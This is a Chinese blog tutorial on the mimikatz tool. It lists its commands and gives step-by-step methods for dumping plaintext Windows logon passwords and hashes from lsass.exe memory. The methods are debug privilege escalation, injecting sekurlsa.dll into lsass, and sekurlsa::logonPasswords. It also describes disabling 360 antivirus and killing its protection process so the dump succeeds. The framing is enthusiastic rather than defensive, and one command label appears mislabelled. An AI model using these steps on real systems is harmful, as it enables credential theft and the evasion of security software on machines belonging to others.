轻量级调试器神器 - mimikatz (学习了,很强大的工具)

神器mimikatz使用详解

.mimikatz简介

 

mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。

 

mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器,其强大的功能还有待挖掘。

作者主页:http://blog.gentilkiwi.com/ 

 

 

.mimikatz基础命令

 

随便输入”xxx::”,会提示”modules:’xxx’ intr0uvable”,大概意思就是你输入的命令不存在,然后会列出所有可用的命令

 

所有的模块与命令,如下图(左边的是模块名称,右边的是描述):

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/FF9CB523E1C04F5B8E9082D5FBE0DC22

 

 

 

1.cls    清屏

 

2.exit    退出

 

3.version    查看mimikatz的版本

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B51AF11760DF432D9CF464BA28859E27

 

4.help    查看帮助信息(全是法文,只能找google了)

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/870E403DF0A549B2BAB204E2BBA56624

 

5.system::user    查看当前登录的系统用户

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/973C54032B0C4CFA84C6B9795EA7BB2D

 

6.system::computer    查看计算机名称

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/23ACB7735CA04103B6B5E077728B8F26

 

7.process::list    列出进程

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/CD80F2B5D1C74F78B451078CD378F9E5

 

8.process::suspend 进程名称    暂停进程

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/0EF31E121398421B8FC226A4973234D5

QQ进程还在,只是QQ无法使用了。

 

9.process::stop 进程名称    结束进程

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/E1BB784E1F5B4E5AA92A81B886B53CCD

 

10.process::modules    列出系统的核心模块及所在位置

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/56464C4268D5471DAAEE68B3D7729545

 

11.service::list    列出系统的服务

 

12.service::remove    移除系统的服务

 

13.service::start stop 服务名称    启动或停止服务

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/113DAAD3AB7B49DA8C0C46F183297137

 

14.privilege::list    列出权限列表

 

15.privilege::enable    激活一个或多个权限

 

16.privilege::debug    提升权限

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5BB146E37EB244A9BF0D7F2DBDB70856

 

17.nogpo::cmd    打开系统的cmd.exe

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/A2617662170943E3862AB34E23E0FD28

 

18.nogpo::regedit    打开系统的注册表

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5FB686563D9E4F8B99617FF34F0BC0FC

 

19.nogpo::taskmgr    打开任务管理器

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B78B325C96264C27B8C6C132AAAE67F6

 

20.ts::sessions    显示当前的会话

 

21.ts::processes    显示进程和对应的pid情况等

 

22.sekurlsa::wdigest    获取本地用户信息及密码

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B8E30254E6E94C8AB30FE2412BCEBB14

 

23.sekurlsa::wdigest    获取kerberos用户信息及密码

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9742D21D9BEE49769BFFEA605004C8C1

 

24.sekurlsa::tspkg   获取tspkg用户信息及密码

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/1DB2CBAAFE85426182958542884200DF

 

25.sekurlsa::logonPasswords   获登陆用户信息及密码

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/126D9CA23586457AB0BD64CF9F613A2F

 

ps1.由于命令很多,就不一一列出了。

      2.kerberos是一种网络认证协议。至于tspkg好像是与远程连接时的网络身份认证有关的。

 

 

:mimikatz获取用户名及密码的方法

方法一

1. 运行主程序:mimikatz.exe

 

2. 输入:privilege::debug      提升权限

3. 输入:inject::process lsass.exe sekurlsa.dll    将sekurlsa.dll 注入到lsass.exe 中(运行到这一步会出现拒绝访问的提示)

4. 输入:@getLogonPasswords    即可获取hash和当前用户的明文密码!

 

原理就是登陆的时候输入的密码,经过 lsass.exe 里的wdigesttspkg两个模块调用后,它们对之进行加密处理,而没有进行擦除,

 

而且该加密通过特征可以定位,并且按照微软的算法可逆。 只要登陆过,就可以抓出来,它进行枚举的。


简单地说,在 Windows 中,当用户登录时,lsass.exe 使用一个可逆的算法,加密过的明文密码,并且把密文保存在内存中,没有清理,然后可以抓出来,还原。 

也就是说,开机以后,只要是登陆过的用户,在没重启前(因为重启内存就清零了,这里不包括使用其他方法清理内存),都可以抓出来,注销也是无用的,

 

因为内存中的密码并没有清除,所以还是可以抓出来的。  

方法二(直接调用sekurlsa模块):(经本人测试有效)

1. 运行主程序:mimikatz.exe
2. 输入:privilege::debug      提升权限

3.输入:sekurlsa::logonPasswords full

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/F1E50B4EB1634B53ACF14EC0AD39744B

 

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/B07A73C5D1D9471CA6A82BB59E1CAE33

 

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/550E9155C00542B1926C3B7A24887D34

 

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/7CDB728FC1EB49F89AFAB22937B6E1A8

 

 

.实际测试

 

.测试系统:Windows 7旗舰版

测试情况如下图:

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/7DE2AC93E1364740B8DA7FB0B61B433E

 

 

在网上看到一些文章说,安装了360之类的杀毒软件后,神器就无法使用了,于是在本地测试了一下。

无论是启动着360,还是退出了360,都会出来下面的情况。

就是在输入inject::process lsass.exe sekurlsa.dll时提示:拒绝访问(如下图)

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/A2881306866F4377BD15380E5F7690EE

后来到进程里看了一下,原来360的主动防御进程还在,http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9CA665500B804A8890FDCB69D91736A2

接着把360的实时防护全部关掉,再把那个进程结束掉就可以正常使用mimikatz了。

 

 

二.测试系统:Windows XP专业版sp3

测试情况如下图:

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/539DD6FC9E624E93B0B9FF95A398F707

 

 

.测试环境:远程连接一台虚拟机中的Windows 7旗舰版

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/4C6DF16996A84FA48CCF90B8D7ED8CC0

 

 

直接运行mimikatz提权时会提示错误,如下图:

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/9CEC0AFC1FCF4D4C9D7C94AEB9B262D9

大意是提示权限不足吧。

 

后来用以管理员身体运行就可以了

http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/5B1448C7242949AA993C68A9A00863B8

 

 测试情况如下:http://note.youdao.com/yws/public/resource/8c7b23e27a17ec8bcb8234905c17ef3d/C6C2764D39CA442294E0EA487F0C2974

 

 总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值